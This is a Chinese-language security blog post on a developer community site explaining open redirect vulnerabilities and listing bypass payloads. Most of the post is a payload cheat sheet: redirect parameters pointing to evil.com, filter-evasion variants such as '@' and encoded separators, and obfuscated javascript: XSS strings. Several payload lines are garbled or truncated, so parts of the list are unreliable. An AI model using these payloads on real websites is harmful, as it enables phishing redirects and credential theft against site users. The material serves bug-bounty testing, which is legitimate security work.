前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >Bypass 重定向

Bypass 重定向

原创
作者头像
Khan安全团队
发布2022-01-10 08:47:05
1.5K0
发布2022-01-10 08:47:05
举报
文章被收录于专栏:Khan安全团队

http 参数可能包含 URL 值,并可能导致 Web 应用程序将请求重定向到指定的 URL。通过将 URL 值修改为恶意站点,攻击者可能会成功发起网络钓鱼诈骗并窃取用户凭据。由于修改后的链接中的服务器名称与原始站点相同,因此网络钓鱼尝试具有更可信的外观。

如何找到它?
  • 大多数情况下,它可以在应用程序 URL 的登录页面上找到,例如“http://example.com/login.php?redirect=http://example.com/page”
  • 接受 URL 值的隐藏参数。您可以使用hakrawlerx8或这个python 脚本来运行这两个工具

基本有效载荷:-

您可以尝试使用这些基本有效负载来测试任何应用程序上的开放重定向漏洞

代码语言:javascript
复制
https://example.com/login?redirect=http://evil.com
https://example.com/login?redirect=javascript:alert(1);

这里evil.com是我们的网站,如果example.com将您重定向到此,那么它很容易受到攻击。如果解决了这个问题,那么试试这个有效载荷:

代码语言:javascript
复制
https://example.com/login?redirect=http://example.com@evil.com
https://
https:com/example

如果这些都解决了,那么试试这些

代码语言:javascript
复制
https://example.com/login?redirect=http://example.com%3F.evil.com
https://
https:com/example
https://
https:com/evil
https://
https:com/example

其他开放重定向有效负载

代码语言:javascript
复制
https://example.com/login?next=//example.com@evil.com
https://example.com/login?next=/\/evil.com
https://
https:com/example
https://
https:com/Cevil
https//.
https:login/comhttp

尝试此 Intigriti 开放式重定向负载生成器工具

开放重定向的 XSS 有效负载

代码语言:javascript
复制
";alert(0);//
java%0d%0ascript%0d%0a:alert(0) 
j%0d%0aava%0d%0aas%0d%0acrip%0d%0at%0d%0a:confirm`0` 
java%07script:prompt`0` 
java%09scrip%07t:prompt`0` 
jjavascriptajavascriptvjavascriptajavascriptsjavascriptcjavascriptrjavascriptijavascript pjavascriptt:confirm`0`

原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。

如有侵权,请联系 cloudcommunity@tencent.com 删除。

原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。

如有侵权,请联系 cloudcommunity@tencent.com 删除。

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 如何找到它?
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档